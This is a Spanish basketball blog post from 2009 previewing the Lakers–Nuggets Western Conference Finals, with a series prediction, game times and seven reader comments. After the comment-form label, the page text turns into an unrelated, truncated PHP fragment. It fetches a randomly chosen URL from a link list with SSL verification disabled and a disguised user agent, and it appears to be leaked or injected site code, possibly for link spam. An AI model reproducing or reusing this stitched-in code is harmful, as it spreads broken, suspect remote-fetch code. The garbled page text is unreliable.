Análisis Final del Oeste 2009: Lakers – Nuggets

19 de May de 2009 por Viva_Dirk

Llegamos a estas alturas de la temporada y lo que anteriormente era un favoritismo clarísimo a favor de los Lakers se ha convertido en dudas en buena parte de los aficionados a la NBA. A mí no me han llegado esas dudas y sigo viendo a los Lakers como claros favoritos.

Los angelinos llegan después de una serie larga contra Houston, si bien es verdad que no demasiado dura. Sus armas son variadas y de gran calibre: Kobe, del que todos sabemos de lo que es capaz, la nueva versión de Gasol definiendo en los momentos claves, el saber hacer y a la vez la parsimonia de Lamar Odom, y la energía de Ariza. Las dudas estan en dos hombres: Derek Fisher y Andrew Bynum. Del veterano base no espero que pare a Billups ni mucho menos, pero sí que meta sus tiros abiertos y acierte con las ayudas, que son dos virtudes que ha tenido siempre. Bynum tiene que pegarse con Nene, que ha promediado 16 puntos contra Dallas con un brutal 58% en tiros. Andrew debe ser superior en el poste bajo tanto en ataque como en defensa, y para colmo debe ayudar en las penetraciones de la batería exterior que tienen lo Nuggets.

Denver llega sin duda en el mejor momento de la última década para la franquicia. La llegada de Billups ha facilitado el trabajo a todos y ha sacado lo mejor de dos importantísimas piezas como JR Smith y Nene Hilario. En el emparejamiento de bases tienen su mayor ventaja, nadie duda de que Chauncey podrá con cualquiera de los bases rivales ni de que elegirá bien cuándo anotar y cuándo pasar. Carmelo ha protagonizado actuaciones pobres contra los Lakers este año y si eso sigue así las posibilidades de los Nuggets serán poquísimas. JR Smith y Chris Andersen son los ‘acelerantes’ del equipo, el talento puro del primero y la intensidad del segundo son claves. El juego interior formado por Martin y Nene no tiene mas remedio que pelear e intentar reducir a nada la diferencia de tamaño que hay a favor de Bynum y Pau.

Claves de la eliminatoria

Kobe VS Carmelo: En realidad es una clave mediatica porque no se encontraran en casi ningun momento frente a frente y lo normal es que ambos ganen la partida a sus defensores. De todos modos Kobe suele liarlas bien gordas cuando visita Denver, permanezcan atentos a sus pantallas.

Defensa interior: Los Nuggets han controlado bien la anotación en la pintura en estos play-offs y son un seguro de pelea y entrega bajo los aros. Los Lakers cuando lo han hecho han ganado comodamente, cuando no han sufrido mucho.

Aportación del banco: Aquí parten los Nuggets con mucha ventaja, pero es precisamente por eso por lo que una aportación decente de los suplentes amarillos pondria las cosas mas fáciles a los ‘jefes’ y sería una preocupación mas para los Nuggets.

Pronóstico: Lakers 4-1

HORARIOS:

– Hoy martes 19 de Mayo: 3AM @Los Angeles (siempre horario España)
– Madrugada Jueves al Viernes (22 de Mayo) @Los Angeles.
– Madrugada del sabado al domingo (24) @Denver.
– Madrugada del lunes al martes (26) @Denver… toca madrugar (o trasnochar mucho) para estos primeros partidos.

Comenta

7 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Vaya por delante que me parecen extremadamente optimistas tus predicciones… aunque no me dolerá equivocarme.

      Citar

  2. Txusma dice:
    #2

    4-1 significaria que los Lakers se pondrian las pilas desde el primer momento y se dejarían de historias. ¿Ha llegado el momento o todavia se van reservar para las finales?

      Citar

  3. telekoman dice:
    #3

    Yo dudo mucho que acaben 4-1. Me parece a mi que a los Lakers les va a costar mucho más ganar a Denver. Hay además otro aspecto a tener en cuenta: La baja forma de Kobe. Y además habrá que ver si viendo que Gasol ha sido el artífice de la victoria en el 7º partido, no se presenta como Angel Redentor y pretende ganar el solito el partido. Eso es algo que siempre temo en Kobe. igual que antes le pasaba a Melo, sólo que ahora con Billups a su lado parece que ha crecido.

      Citar

  4. arivas dice:
    #4

    No esperaríais que Viva pusiera un pronóstico facilón ,no??

    Coincido en que el juego interior puede ser la calve y la verdad yo no soy tan optimista con Bymun, así que a Pau le tocará ponerse el mono de faena.

    Yo creo que la eliminatoria será igualada, apuesto por los Lakers en 7 .

      Citar

  5. Txusma dice:
    #5

    Hay una cosa que tengo clara: Si se llega al séptimo partido me juego todos mis ahorros por los Lakers.

      Citar

  6. MagicJohnson32 dice:
    #6

    @ Telekoman… ¿la baja forma de Kobe?

      Citar

  7. Ayuso dice:
    #7

    Empezamos bien.
    1-0.(Por los pelitos)
    P.D.:¿Habéis visto ya el sorteo del draft?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>